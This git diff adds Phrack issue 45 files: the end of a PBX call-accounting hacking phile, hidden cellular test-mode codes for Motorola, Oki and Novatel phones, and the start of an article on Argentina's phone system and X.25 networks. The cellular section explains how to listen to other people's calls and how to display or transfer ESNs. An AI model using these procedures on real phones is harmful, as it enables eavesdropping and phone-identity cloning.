+      818           1            1         1.0       $    .50     $     0.50
+      904          93           19         4.8       $   1.21     $    23.06
+      912          64            1        64.0       $  14.72     $    14.72
+    ------     -------      ------      --------     --------     ----------
+     TOTAL       1097          326         3.3       $    .50     $   164.95
+
+<-CTRL Z->
+COMMAND ?55
+EXCEPTION REPORTS
+
+              REPORT OF MOST EXPENSIVE CALLS
+
+
+    REPORT PERIOD                                                    PAGE  1
+    09/01/92 - 09/05/92                                     09/05/92   9:16A
+
+    EXTEN-   TRUNK       NUMBER                           DURATION
+     SION    USED        DIALED          DATE      TIME    MINUTES    COST
+    ------  ------  ----------------   --------   ------  --------  --------
+      246    80012     (912)354-2813   09/01/92    2:33P     63.5   $  14.72
+      316    87001     (813)299-2068   09/03/92    4:16P     36.9   $   8.19
+      248    87002     (   )863-5701   09/03/92   11:28A     21.5   $   4.89
+      261    87002     (904)677-1235   09/03/92    2:20P     15.3   $   3.72
+      261    87002     (904)677-1235   09/01/92    3:36P     13.1   $   3.26
+      255    87001     (813)293-4319   09/04/92    9:36A     13.6   $   3.13
+      270    87002     (   )649-4966   09/04/92   11:32A     14.3   $   2.85
+      261    87001     (   )660-5567   09/01/92   10:16A     14.8   $   2.85
+      200    87002     (904)599-1543   09/03/92    3:27P     11.2   $   2.80
+      266    80009     (516)785-1200   09/03/92    3:32P     10.5   $   2.75
+      261    87001     (   )660-5525   09/04/92   12:48P     13.2   $   2.66
+      268    80014     (606)282-7223   09/03/92   11:00A     10.9   $   2.53
+      246    87002     (904)677-2551   09/03/92    3:05P      9.7   $   2.34
+      261    80010     (703)845-1400   09/01/92    9:23A      9.1   $   2.30
+      316    87002     (   )290-1030   09/02/92    3:04P     11.8   $   2.28
+      246    87002     (904)677-6774   09/01/92    2:20P      8.5   $   2.11
+      316    87001     (   )290-1030   09/03/92    2:58P     10.5   $   2.09
+      316    87001     (   )290-1030   09/02/92    8:56A      9.6   $   1.90
+      316    80004     (212)605-8586   09/02/92    1:58P      6.9   $   1.75
+      270    80001     (513)568-4933   09/03/92    9:15A      7.0   $   1.61
+
+
+              REPORT OF LONGEST CALLS
+
+
+    REPORT PERIOD                                                    PAGE  1
+    09/01/92 - 09/05/92                                     09/05/92   9:16A
+
+    EXTEN-   TRUNK       NUMBER                           DURATION
+     SION    USED        DIALED          DATE      TIME    MINUTES    COST
+    ------  ------  ----------------   --------   ------  --------  --------
+      246    80012     (912)354-2813   09/01/92    2:33P     63.5   $  14.72
+      316    87001     (813)299-2068   09/03/92    4:16P     36.9   $   8.19
+      261    80001     (800)727-5663   09/04/92    2:06P     25.8   $    .00
+      248    87002     (   )863-5701   09/03/92   11:28A     21.5   $   4.89
+      261    87002     (904)677-1235   09/03/92    2:20P     15.3   $   3.72
+      261    87001     (   )660-5567   09/01/92   10:16A     14.8   $   2.85
+      270    87002     (   )649-4966   09/04/92   11:32A     14.3   $   2.85
+      255    87001     (813)293-4319   09/04/92    9:36A     13.6   $   3.13
+      261    87001     (   )660-5525   09/04/92   12:48P     13.2   $   2.66
+      261    87002     (904)677-1235   09/01/92    3:36P     13.1   $   3.26
+      260    80003     (800)999-4441   09/03/92   11:49A     12.9   $    .00
+      270    80010     (800)342-3763   09/02/92    3:32P     12.5   $    .00
+      316    87002     (   )290-1030   09/02/92    3:04P     11.8   $   2.28
+      252    80015     (800)944-1535   09/04/92    9:00A     11.5   $    .00
+      252    80008     (800)944-1535   09/02/92   11:07A     11.5   $    .00
+      200    87002     (904)599-1543   09/03/92    3:27P     11.2   $   2.80
+      315    80009     (800)622-4448   09/02/92   10:33A     11.2   $    .00
+      268    80014     (606)282-7223   09/03/92   11:00A     10.9   $   2.53
+      315    80011     (800)622-4448   09/02/92    3:35P     10.8   $    .00
+      264    80012     (800)527-2274   09/03/92    3:12P     10.7   $    .00
+
+
+           REPORT OF MOST FREQUENT NUMBERS
+
+
+    REPORT PERIOD                                                    PAGE  1
+    09/01/92 - 09/05/92                                     09/05/92   9:16A
+
+         NUMBER             TOTAL        TOTAL         AVRG          TOTAL
+         DIALED             CALLS        TIME          DRTN          COST
+    ----------------       ------       -------       -----       ----------
+       (   )290-1030           53          131          2.4       $    27.91
+       (800)944-1535           37          121          3.2       $     0.00
+       (800)812-5386           15           15          1.0       $     0.00
+       (   )411-0000           13           13          1.0       $     0.00
+       (   )660-5525           13           36          2.7       $     7.98
+       (813)293-4319           11           38          3.4       $     9.35
+       (904)677-1235            9           46          5.1       $    11.43
+       (800)622-4448            8           45          5.6       $     0.00
+       (   )660-5524            5           11          2.2       $     2.02
+       (   )295-9119            5           11          2.2       $     2.28
+       (   )660-5528            5           13          2.6       $     2.47
+       (516)785-1200            4           19          4.7       $     4.75
+       (800)342-3064            4            4          1.0       $     0.00
+       (800)888-6823            4           16          4.0       $     0.00
+       (   )660-5543            4            4          1.0       $     1.14
+       (508)960-6186            4            5          1.2       $     1.50
+       (800)526-4371            3            6          2.0       $     0.00
+       (   )863-5701            3           32         10.6       $     7.19
+       (212)708-1728            3           10          3.3       $     2.75
+       (303)586-2030            3            6          2.0       $     1.75
+
+<-CTRL Z->
+COMMAND ?65
+MCX-7700/PC V4.0.5  1189
+EB4B     E46D     1265     0101
+<-CTRL Z->
+COMMAND ?10
+
+SYSTEM PARAMETERS MENU
+
+PRINTER = 1
+PABX    = 2
+REPORT  = 3
+OPTIONS = 4
+
+SELECT FUNCTION : 2
+
+ ACCOUNTS      ------TRUNKS------   EXT   ACCESS   TOLL
+SIZE    NO.    NO.   '-'  GRP  EQP SIZE  ABS  COST DIG
+ 04    1024    040    N    2    3    3    Y    N    1
+ -+++ FUNCTION CANCELED +++
+<-CTRL Z->
+COMMAND ?10
+
+SYSTEM PARAMETERS MENU
+
+PRINTER = 1
+PABX    = 2
+REPORT  = 3
+OPTIONS = 4
+
+SELECT FUNCTION : 3
+
+CALL   ----DROP OR REJECT---  AUTO  TO-  LIST
+GRACE LOC  ACT  INC  TRK  EXT  PRD  DAY  NULL
+ 05    N    N    N    N    N    0    Y    N
+ -+++ FUNCTION CANCELED +++
+<-CTRL Z->
+COMMAND ?10
+
+SYSTEM PARAMETERS MENU
+
+PRINTER = 1
+PABX    = 2
+REPORT  = 3
+OPTIONS = 4
+
+SELECT FUNCTION : 4
+
+SER  PC   ZERO
+IAL  PORT  OPR
+ Y    Y    Y
+ -+++ FUNCTION CANCELED +++
+<-CTRL Z->
+COMMAND ?00 <<00 terminate programming>>
+
+
+
+
+******************************************************************************
+<><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><>
+
+Ending notes:
+-------------
+I've had this system laying around for the past 2 years and never gave a
+flying fuck about it, yet when I find new systems I am unfamiliar with I
+always wonder why the hell no one writes a phile on 'em to pass on the
+knowledge.
+
+Anyway, to all who have hacked not-so-well-known systems, or even something
+you consider lame, WRITE A PHILE ON IT!!  If enough people start doing this,
+a newz letter could be started.. call it LSD (Lame Systemz Digest) or
+something.  Woa, what a concept!
+
+
+            ++++++ Quantula Sapientia Regitur Mundus ! ++++++
+       (What little wisdom is shown in the government of the world)
+
+
+
+Greetz 2:
+---------
+Kaleidox, Garbage Heap & P/S, Night Ranger, Con Artist, Green Hell,
+Maldoror (The OLD Hannibal), Citizen-One, Speed Demon, The Pyrotechnic,
+Knight Lightning, King Cobra, Death Wish, Shadow Runner, Axiom Codex,
+Phunatic Phreak, and all the other K-rad people I forgot to mention.
+
+<><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><>
+******************************************************************************
diff --git a/phrack45/26.txt b/phrack45/26.txt
new file mode 100644
index 0000000..99843b1
--- /dev/null
+++ b/phrack45/26.txt
@@ -0,0 +1,333 @@
+                              ==Phrack Magazine==
+
+                 Volume Five, Issue Forty-Five, File 26 of 28
+
+******************************************************************************
+
+                          Cellular Debug Mode Commands
+
+
+**************************************
+
+ Motorola test mode programing codes
+        for most motorola phones
+
+**************************************
+
+01# Restart (re-enter DC power start-up
+    routine)
+
+02# Display Current Telephone Status
+
+04# Initializes Telephone to Std.
+    Default Conditions
+
+05# TX Carrier On (key transmitter)
+
+06# TX Carrier Off
+
+07# RX Off (mute receiver audio)
+
+08# RX Audio On (unmute receiver audio)
+
+09# TX Audio Off
+
+10# TX Audio On
+
+11(ch.no.)# Set Transceiver to channel
+    (RX & TX)
+
+12# Set power level
+
+13# Power Off
+
+14# 10 khz Signalling Tone On
+
+15# 10 khz Signalling Tone Off
+
+16# Setup (Transmits a five word RECC
+    message)
+
+17# Voice (Transmits a two word REVC
+    message)
+
+18# C-SCAN
+
+19# Display Software Version Number
+    (year & week)
+
+25# SAT On
+
+26# SAT Off
+
+27# Transmit Data (TX continuous
+    control channel data)
+
+32# Clear (clears non-volatile memory)
+
+33# Turn DTMF on
+
+34# Turn DTMF off
+
+35# Display RSSI ("D" series portable
+    only)
+
+35# Set Audio path
+
+38# Display ESN (displays ESN in four
+    steps, hit * till back at start)
+
+39# Compander On
+
+41# Enables Diversity
+
+42#,43#,44# Disable Diversity
+     (different models use different
+      codez)
+
+45# Display Current RSSI
+
+46# Display Cumulative Call Timer
+
+47# Set Audio level
+
+48# Side Tone On
+
+49# Side Tone Off
+
+55# Display and or program NAM (test
+    mode programing)
+
+58# Compander On
+
+59# Compander Off
+
+61# ESN Transfer (for series I and Mini
+    T.A.C's)
+
+62# Turn On Ringer
+
+63# Turn Off Ringer
+
+66# Identity Transfer (series II and
+    some current portables)
+
+68# Display FLEX and Model info
+
+69# Used with Identity Transfer
+
+***************************************
+***************************************
+
+1. Entering test mode on 25 pin
+   transceivers is as follows:
+
+   for F19ATA or F19CTA ground pin 11
+       and power-up phone,
+   for DMT/Mini T.A.C series I, II,
+       III ground pin 21 and power-up
+       phone.
+
+2. Entering test mode on OEM 32 pin
+   transceivers is as follows:
+
+     ground pin 9 and power-up phone.
+
+3. Entering test mode on portable
+   phones is as follows:
+
+     ground pin 6 and power-up phone.
+
+4. Entering test mode on Micro T.A.C's
+   phones is as follows:
+
+     ground pin 2 and power-up phone.
+
+------------------------------------------------------------------------------
+
+Oki Debug Commands - Good Timing
+From Nuts & Volts Dec. 1993
+
+To Enter Debug Mode:
+
+Press 7 & 9 Together
+then press MENU, SEND, END, RCL, STO and CLR
+then press 1 & 3 together
+
+Commands:
+
+#01     Suspend         Performs Initialization
+#02     Restart         Terminates the test mode
+#03     Status          Shows the current status of TRU
+#04     Reset           Resets the timer
+#07     Carrier On      Turns the carrier on
+#08     Carrier Off     Turns off the carrier
+#09XXXX Load Synth      Sets the synthesizer to channel XXXX
+#10X    Set Attn        Sets the RF power attenuation to X
+#11     RX Mute         Mutes the receive audio
+#12     RX Unmute       Unmute the receive audio
+#13     TX Mute         Mutes the transmit audio
+#14     TX Unmute       Unmutes the transmit audio
+#16     ST On           Transmits a signalling tone
+#17     ST Off          Turns off the signalling tone
+#18     Setup           Transmits a 5 word RCC message
+#19     Voice           Transmits a 2 word RVC message
+#20     Rcv SU          Receives a 2 word FCC message
+#21     Rcv VC          Receives a 1 word FVC message
+#22     Send NAM        Returns the information contained in the NAM
+#23     Version         Displays the TRU software version
+#24     Send SN         Displays the ESN
+#25XXXX Mem             Displays the resident memory data at XXXX
+#28     WSTS            Receive 1 word messages on CC until #56/CLR
+#29     WSTV            Receive 1 word messages on VC until #56/CLR
+#32X    SAT On          Enables the transmission of SAT X
+#33     SAT Off         Disables the transmission of SAT
+#35     Hi TN On        Activates the 1150 Hz tone to receive audio line
+#36     Hi TN Off       Deactivates the 1150 Hz tone
+#37     Lo TN On        Activates the 770 Hz tone to receive audio line
+#38     Lo TN Off       Deactivates the 770 Hz tone
+#42XX   DTMF On         Enables the transmission of DTMF frequency XX
+#43     DTMF Off        Disables the transmission of DTMF
+
+------------------------------------------------------------------------------
+
+Novatel 8325
+------------
+
+This article is copyright 1993 by the author. Reproduction is allowed, with the
+following restrictions:
+
+1) Any copy, or edited version, of this file must contain this copyright
+   notice, the author's name, and the information regarding Phrack.
+2) No commercial use may be made of it without prior permission of the author.
+   This permission may be revoked at any time, in which case all reproduction
+   must cease, and any copies must be destroyed.
+3) Use as evidence in a court of law, for the purposes of this agreement,
+   is considered a commercial use.
+4) This agreement can not be changed, or added to in any way. Receipt of this
+   work through an authorized commercial distributor does not imply permission
+   given to the commercial consumer to re-distribute it in a commercial manner.
+5) Any part of this agreement found invalid by a court of law does not render
+   the remainder of this agreement void: The rest of the terms of the agreement
+   must still be adhered to.
+
+
+The Novatel 8325 is a bag-style portable cellular telephone. It is known as a
+'ProClassic' in Novatel MarketSpeak. Two different handsets (control units) are
+used with the 8325 transceiver: the 4130 and 5160. My phone has the 5160.
+The handsets appear very similar: I doubt there is any functional difference
+between them. Earlier transceivers, such as the 8320, contain many of the same
+features as the 8325, though the hidden menus are accessed with different
+codes. The only other code I know of is #746, which is the code for the 8320
+CFG menu.
+
+Terms: Throughout this article, I will refer to things without explaining them
+each time. If you get lost, refer to the table below.
+
+NORMAL = the phone is in this mode when it is not locked, or in either of the
+hidden menus, or in the 'user' menus accessed by the MENU key. The screen will
+display either READY or SCANNING when in normal mode. This is the mode the phone
+is in when it is first turned on.
+
+LOCKED = when the phone displays LOCKED, a code must be typed to enter normal
+mode. The default code is 1234. The telephone can be locked using [FCN] 1 [SND]
+from normal mode. The phone must be locked before entering in any of the codes
+to access the hidden menus described below.
+
+TBL = troubleshooting mode = the hidden menu accessed with 546*. This is a
+menu supposedly know only to Novatel, not even their dealers are supposed to
+know about it. According to Novatel, some of the features in this menu could
+destroy the phone if improperly set. Scare tactics? You decide.
+
+CFG = configuration mode = the hidden menu accessed with 510*. This is used by
+dealers to set up a subscriber's service. As far as I know, there is nothing
+particularly dangerous about this mode, but Novatel is touchy about it
+nonetheless. I take no responsibility for any damages.
+
+
+Troubleshooting Mode - TBL
+
+First, lock phone with [FCN] 1 [SND]
+Then, enter 546* on the keypad. The phone
+will not make tones for each key pressed.
+
+TBL 8325    /___ This is what shows up on my phone.
+REV NA0C    \    Yours may be different.
+
+You are now in troubleshooting mode. You may page through the functions
+by using the arrow keys, or access the functions by number, by hitting #
+(The screen will display DIR PAGE ACCESS) and then the function number,
+from the chart below. Note that on initially entering Troubleshooting mode,
+you are on function 37. Toggle with the [SND] key, unless otherwise noted.
+
+#    Screen       Default   Toggle/Range       Description
+-----------------------------------------------------------------------------
+11   TRANSMIT     OFF       ON   Turn the transmitter on.
+12   TX TEST      OFF       [CLR]=OFF, 0-7 test data stream, audio levels of
+13   CHANNEL      0000      0000-1023    [H/F] = down, [RCL] = up.
+14   TX AUDIO     OFF       ON
+15   VOLUME GAIN  6         0-7
+16   RX AUDIO     OFF       ON   Turn the receiver on. Set this to ON
+                                 and use in conjunction with #13
+                                 (CHANNEL) to listen to calls.
+17   POWER ATTN   3         0-7
+18   SYNTH LOCKED                       synthesizer locked. if reads
+                                        unlocked,  the phone has real problems.
+19   SAT OFF      ??                    transmitted SAT
+20   RF POWER     OFF       ON          Not an option, but an indicator. When
+                                        TRANSMIT is set ON, this displays ON.
+21   SPEAKER      ON        OFF
+22   SIDE TONE    ON        OFF
+23   TX DTMF      OFF        Tone test. [CLR] then 00-25. DTMF means touch-tone
+                 00 = DTMF 1     01 = DTMF 2      02 = DTMF 3     03 = DTMF A?
+                 04 = DTMF 4     05 = DTMF 5      06 = DTMF 6     07 = DTMF B?
+                 08 = DTMF 7     09 = DTMF 8      10 = DTMF 9     11 = DTMF C?
+                 12 = DTMF *     13 = DTMF 0      14 = DTMF #     15 = DTMF D?
+                 16 = 1+2+3      17 = 4+5+6       18 = 7+8+9      19 = *+0+#
+                 20 = 1+4+7+#    21 = 2+5+8+0     22 = 3+6+9+#    23 = A+B+C+D?
+                 24 = ?          25 = Wake-up-tone. The + signs are use to
+                 signify keys simultaneously held on a regular (desk-style)
+                 touch-tone phone. These tones are each half of the dual tones
+                 the comprise touch tones.
+24   RX MODE      BURST     CONT
+25   RX TEST      OFF       ON
+26   FRME CNT     000000   Frame count.  (of counter)
+
+27   BIT ERR      0000000   Bit Error.   every so often is no big
+                                         deal. Hit any key to clear.
+28   WATCHDOG     ON        OFF          watch-dog periodically checks the
+                                         timing of the different clocks
+                                         in the system.  Hit any key to turn
+                                         this off and the Phone re-starts
+29   HOOK SW      OFF                    Hook Switch - since a bag phone has
+                                         no switch hook, always off.
+30   HORN MODE    ON        OFF          Toggles indicator light
+31   BELL MODE    0         0-9, [SND]
+32   RSST         20x                    Received Signal Strength Indicator
+33   MICROPHN     ENABLED   DISABLED
+34   NVM TEST     RM=0 E=1               Non-Volatile Memory Test
+35   COMPANDR     ON        OFF          A Compander compresses speech to
+                                         confine energy to the given bandwidth.
+36   NVM CLR      USE SND                Non-Volatile Memory [SND]="ACCESS
+                                         DENIED"
+37   TBL 8325     REV NA0C               MENU,MODEL,REVISION (INITAL SCREEN)
+------Modulation------- Don't mess with this stuff - it can screw up your phone
+ N0 means channel bank 0. Banks are 0-4. Tune to a mid-band channel using the
+ keypad, and tune with [H/F] down and [RCL] for up.
+38   MODG CLR     Any Key, 0 = YES        resets options #39,#40,#41 to default.
+39   CHN 0991     N0 AMG16  AMG = SAD Deviation.
+40   CHN 0991     N0 DMG16  DMG = Signalling tone.
+41   CHN 0991     N0 SMG12  SMG = Transmit audio level.
+------Digital Potentiometers-- DANGER! Play with this, and you may have to
+                               send your phone out for repair.
+42   DPOT CLR     Any Key, 0 = YES   resets options #43,#44,#45,#46 to default
+43   MICROPHN     14190 OHM
+44   EXPANDER     14936 OHM
+45   TX LIMIT     12180 OHM
+46   SPEAKER      15420 OHM
+------Analog Switches-------- Enables/Disables on-board potentiometers.
+47   ANALOG SW1   ON         High end of transmit audio
+48   ANALOG SW2   OFF        Low end of transmit audio
+-----
+49   PWR LVL3     DAC0777     power level, reading from digital-analog converter
+50   PL3@0000     14          power level @ channel, received signal strength
\ No newline at end of file
diff --git a/phrack45/27.txt b/phrack45/27.txt
new file mode 100644
index 0000000..b9180de
--- /dev/null
+++ b/phrack45/27.txt
@@ -0,0 +1,1352 @@
+                              ==Phrack Magazine==
+
+                 Volume Five, Issue Forty-Five, File 27 of 28
+
+****************************************************************************
+
+                             International Scenes
+
+There was once a time when hackers were basically isolated.  It was
+almost unheard of to run into hackers from countries other than the
+United States.  Then in the mid 1980's thanks largely to the
+existence of chat systems accessible through X.25 networks like
+Altger, tchh and QSD, hackers world-wide began to run into each other.
+They began to talk, trade information, and learn from each other.
+Separate and diverse subcultures began to merge into one collective
+scene and has brought us the hacking subculture we know today.  A
+subculture that knows no borders, one whose denizens share the common goal
+of liberating information from its corporate shackles.
+
+With the incredible proliferation of the Internet around the globe, this
+group is growing by leaps and bounds.  With this in mind, we want to help
+further unite the communities in various countries by shedding light
+onto the hacking scenes that exist there.  If you want to contribute a
+file about the hacking scene in your country, please send it to us
+at phrack@well.com.
+
+This month we have files about the scenes in Argentina, Australia and Greece.
+
+________________________________________________________________________________
+
+
+                Argentina: Hacking at the ass of the world
+                ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+                               by: OPii.
+
+  Yeah, i know, it's something you just can't stop, whenever you try to sleep
+  that recurrent idea comes and recurses through your very brain, you are
+  blind, it happens to be worse than MTV, you just can't get to sleep, you stay
+  up for hours, you forget to feed yourself, you can't even remember your name,
+  you turn catatonic, you stand still stretching every nerve and mumbling
+  "hhmmpff..sc.eenn...arghh..teennn..ahhh..." and then you explode in a
+  terrifying scream...
+
+    "ARRRGHHHHHH, WHAT THE FUCK IS GOING ON IN ARGENTINA??????"
+
+
+  Right?
+
+  NO????
+
+  Well, I never really thought that could happened but I'm gonna answer
+  the question anyway, I know you probably don't give a fuck about Argentina
+  and it's scene but, hey, reading shitty text files is not new to you so
+  you wanna change your habits RIGHT NOW? Nahhhhhhhh
+
+Introduction
+~~~~~~~~~~~~
+  Ok, enough is enough, so let's get to the point.
+
+  Argentina is lagging. While other countries are flying toward the hyper
+  publicized "Data Highway", Argentina is still trying to fork it's path in
+  the telecommunication's jungle. And this has it's pros and cons.
+
+  Before 1990 the telecommunications in Argentina were in hands of Entel,
+  the government's monopolistic arm that ruled the area. But, and there's always
+  a BUT, the service provided by Entel was worse than bad. For too many
+  people it was normal to wait YEARS for a line, paying $1000+ when they
+  finally got it installed, and then a never-ending nightmare began,
+  if it rained, the line went dead, if it didn't die it went crazy, you
+  could pick up the phone and listen to your favorite radio station but
+  of course you could not call anyone. Or you could had bizarre conferences
+  with persons you'd never met...it was basically POTS but with features
+  that Entel never thought about... N-way calling, call forwarding to hell,
+  continuous call waiting in the form of line noise, speed dialing to always
+  busy DNs...
+
+  Ahh, you could get a line in less than a month if you paid the $1000
+  to some bogus vapor-companies whose workers would came pulling loops out
+  of their sleeves and installing them quietly (yeah, all completely illegal),
+  these companies were known as the phone mob.
+  Remember, Entel was the ONLY company entitled to give you not only a phone
+  line but the phone itself.
+
+  And the bills... the bills always had an encrypted message in them, you needed
+  a PhD in Black Magic in order to decipher what the fuck the telco was
+  charging you... but for most mortals the meaning was only one:
+  PAY, pay whatever we order you to pay, and don't ask why.
+
+  You made only local calls? PAY! (local calls are not free in Argentina)
+  You didn't make that call to Nairobi, Kenya? PAY!
+  Ohh, but you cant dial outside the country with your line? PAY ANYWAY!
+  You want to complain? PAY FIRST!
+
+  In 1990 the government decided to split Entel in two companies and sell them
+  to private investors, each company would service either the northern or
+  southern Argentina, the border being Buenos Aires' downtown (in case you
+  don't know Buenos Aires is the capital of Argentina).
+
+  This was nothing more than giving the monopolistic Entel to two new
+  monopolistic companies as we will see.
+
+  So the government sold Entel and two new companies appeared in Argentina's
+  communications scene:
+
+ - Telefonica de Argentina. Servicing the southern part of Argentina, this
+   company is formed by the Spanish Telefonica de Espaa (owned by Spanish gov.)
+   and several Argentinian and foreign investors.
+ - Telecom Argentina. Services the northern Argentina and it's major
+   stockholders are France Telecom and STET (Italy).
+
+  Also, another two companies where born:
+
+ - Telintar. Owned by Telefonica and Telecom. The ONE AND ONLY LD carrier
+   in Argentina.
+ - Startel. Guess who owns it? Yeah, Telefonica and Telecom, with some
+   philanthropic aides like Citicorp, J.P. Morgan and Techint and Perez
+   Companc ( Argentinian megacorps). Startel provides TELEX and data
+   transmission services as well as mobile and sea radio links. It runs
+   the most known Argentinian X.25 PSN (ARPAC).
+
+  The government however had to assure minimal control of the companies
+  and verify that their procedures and actions conform to the Argentinian
+  laws. That's the duty of the SNC (National Communications Secretary) and
+  the CNT ( National Telecommunications Commission), the last being some
+  sort of mirror image of the American FCC.
+
+  Did anything changed with the appearance of Telefonica and Telecom?
+  Did the customers noticed an improvement in the phone service?
+
+  Both companies began to "correct" Entel's mess rapidly but personally
+  I consider it was a little more than nothing for the customer.
+  They did change loops, trunks, switches, added features, installed
+  inter-office fiber links, private PSNs and more. But, it's 1994
+  now, and I still know zillions of persons that had their line dead
+  for 4-5 months, or have been visiting the telco offices everyday
+  during a month complaining about line_noise/no_dial_tone/
+  dial_tone_but_no_dialing/cant_receive_calls/cant_dial_certain_NPAs/
+  bills_are_way_out_of_scope/etc.
+
+  To conclude this section I will only say that:
+
+   1). There's still a telecom. monopoly in Argentina, now in the form
+       of two private companies.
+   2). Service got better but it's still a mess, dirty and expensive.
+   3). Both companies enjoyed an explosive economic grow since 1990, their
+       shares being one of the best things you could get a hold of in the
+       stock exchange.
+
+The Phony Phone System
+~~~~~~~~~~~~~~~~~~~~~~
+
+  Argentina uses pulse dialing, except for those lucky persons that
+  have the latest installed switches in their COs. If you don't have
+  DTMF you HAVE TO ask for it, you can do this dialing 112 (Telecom)
+  or visiting the office (Telefonica and/or Telecom). Someone will
+  eventually listen to you and answer:
+    1) "Uh???? What's DTMF?" - Forget it, ever considered teaching algebra
+                               to a chimpanzee?
+    2) "I'm sorry you can't dial MF with that line" - No luck
+    3) "Not a problem, we'll set it for MF"         - You bastard!
+
+
+  Switches are Step by Step or Crossbars but since 1990 the number of
+  electronic, and specially, digital switches has increased constantly.
+  Both, Telecom and Telefonica, use equipment from many different
+  vendors: Siemmens, Ericsson, Hitachi, Fujitsu, Northern Telecom, AT&T,
+  Alcatel, NEC, Spanish companies, Italians, Norwegians, and God only knows
+  what else. Most switches are either European or Japanesse.
+  As for PBXs, Siemmens, Ericsson and Fujitsu are the brands of choice for
+  most companies, with the recent grow of NT's Meridians among large
+  corporations.
+
+  DNs are 7 digits but still 6 digits in low line density locations,
+  this includes certain areas in Buenos Aires, the capital. Generally, 6
+  digit DNs can't complete an international call for themselves, they need
+  operator assistance ( DDI is the "feature" that allows a subscriber
+  to make international calls without operator's assistance, geez). Other
+  features offered are 3-way, conference, call forwarding, call waiting
+  (can't be fucking disabled temporarily!) and more. Telecom also offers a
+  service called "Factel"  which is a detailed list of all the calls you made
+  in a billing period  (2 months), this comes  with your bills and they
+  charge you for EACH PAGE.
+
+  LOCAL CALLS ARE *NOT* FREE.
+
+  Toll free numbers (800) where introduced two years ago but so far there are
+  few 800s to call, one of the few is the CNT's 800 for reception of
+  complains about the telco's service.
+
+  Both Telefonica and Telecom use Frecuency Division Multiplexing (FDM) or
+  Time Division Multiplexing (TDM) for grouping channels with a bandwidth
+  of 4KHz into a multiplexed signal, called Base Band, of several channels.
+  Analog and digital multiplexing is used depending on the equipment
+  installed.
+
+  The hierarchy of groups is as follows:
+
+  - Primary Group or Basic Group: 12 4KHz channels for a total bandwidth of
+    48Khz, generally placed in the 60-108 KHz space.
+    There are three ways for forming a Basic Group: Direct Modulation,
+    Pre-group Modulation or Premodulation, I won't discuss 'em in this
+    article.
+  - Secondary Group (aka Super Group): 5 Primary Groups (PG) for a total of
+    12x5 = 60  channels and a 240KHz bandwidth., placed in 312-552KHz band
+  - Master Group (MG): 5 SGs, 60x5 = 300 channels, 1232 Khz. bandwidth
+    ( 5x240Khz + 32Khz.) in the 812-2044Khz. band
+  - Super Master Group (SMG):
+      3MGs, 3x300 = 900 channels
+      3 x 1232Khz + 176  Khz = 3872 KHz bandwidth. (8516-12388 KHz)
+
+  For digital multiplexing, using TDM, things are like this:
+  Pulse amplitude modulation (PAM) is first used to sample the 4Khz
+  channel, then the PAM signal is quantified in 256 discrete values
+  ( 8 bits) and this is finally multiplexed as follows:
+
+  -   A basic 2048 Mbit/s for 30 channels  (8Khz/channel for they're sampled...)
+  -   8 Mbit/s = 4x2Mbit/s   (  120 channels)
+  -  34 Mbit/s = 4x8Mbit/s   (  480 channels)
+  -  52 Mbit/s = 6x8Mbit/s   (  720 channels) <--this is not standard)
+  - 140 Mbit/s = 4x34Mbit/s  ( 1920 channels)
+  - 565 Mbit/s = 4x140Mbit/s ( 7680 channels)
+  - 900 Mbit/s = 6x140Mbit/s (11.520 channels)
+
+ Both DC and AC is used for signalling depending on several characteristics
+ as trunk length, the switch's technology, etc.
+ Reverse polarity and E and M signalling is used with DC, while DP
+ and MF is used with AC. CCITT #3,CCITT #4 or CCITT #5 is used
+ on international circuits, otherwise R2 is used.
+ I won't go into the details of the different in band signalling methods as they
+ are probably well known by you... i'll only point that, as you guessed,
+ things are set for interesting boxing experiences.
+ Argentina is the place for the casual explorer in this topic, even "Joe
+ customer" could choose alternate routes for his local calls, all by
+ himself, some years ago, prefixing the destination DN with a 3 digit number.
+ There are other interesting things to ponder here, like the way calls
+ from one company's zone to the other company's zone are completed, etc.
+ Also, SxS and Xbar switches are fun to mess with, known their "hidden
+ features" like line freezing, forced ANIF and forced linkage of the
+ circuit to a given CO.
+
+ Payphones, known as TPAs in local telco. jargon, comes in different
+ flavors. First, the one that both companies inherited from their
+ predecessor, Entel, this one sports a rotary dial and needs tokens to
+ operate.
+
+ Then the obsoleted Telecom's "card puncher", needed a card with a mag
+ strip that the phone would punch each time you used it, these have been
+ replaced by the new Telecom's modular payphone. (Perhaps it was a piece of
+ shit and Telecom replaced them right away??? ). You wont find one of these
+ easily.
+
+ Telecom's modular payphone works with cards and wont accept tokens or
+ coins, these have a cute LCD and controls for volume, language selection
+ of the messages displayed as well as buttons for redialing and replacing
+ an exhausted card while a call is in progress. It's uses cards with an
+ 8 contacts on-card chip.
+
+ Telefonica's payphones accept cards AND tokens, they also have a LCD
+ and buttons for volume, redial, etc. They also use cards with 8 contacts
+ on-card chip. They skipped the "brilliant" card punching stage so these are the
+ phones you'll find in Telefonica's area.
+
+ NO PAYPHONE WILL ACCEPT REGULAR CREDIT CARDS.
+ ONE COMPANY'S PHONE CARD IS INCOMPATIBLE WITH THE OTHER COMPANY'S PHONES.
+  ( this is supposed the change this year? )
+ Phone cards cant be recharged when they're exhausted.
+  ( eh, this is not quite true )
+ Telefonica is said to make their payphones accept regular coins any
+ time noooooooowwwwwwww bahahahahahahah .
+
+The Networks
+~~~~~~~~~~~~
+
+  Networks in Argentina are growing, and are growing fast, but they are
+  still poor and slow when compared to other countries nets.
+  LAN are usually based on PCs with Novell's Netware in its different
+  flavors or some lousy Lantastic.
+  As for WANs, the computers you'll ran into are IBM mainframes, DEC
+  VAXes running VMS, and Unixes (generally IBM's RS/6000 w/AIX or lower
+  end PC clones running SCO).
+  Still, open systems are being happily adopted and TCP/IP based LANs are
+  emerging everyday.
+  There aren't many systems online 24hrs/day but mostly online during work
+  hours. You'll find most systems unreliable, bad configured, and worse
+  used.
+
+  ARPAC, The Jester's Playground
+  ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+     ARPAC (DNIC==7222) is the most known PSN in Argentina. It has dialup
+     access in more than 30 cities in the country, although the fastest
+     baud rate for them is an infamous 2400bds.  Leased lines go
+     up to a maximum of 19.2Kbds.
+     The protocol used is the X.25 suite and ARPAC offers the following
+     optional facilities:
+     - Closed User Group. (CUG)
+     - Fast Select.
+     - Packet size negotiation.
+     - One-way logical channels. (outgoing/incoming).
+     - Non-standard window sizes.
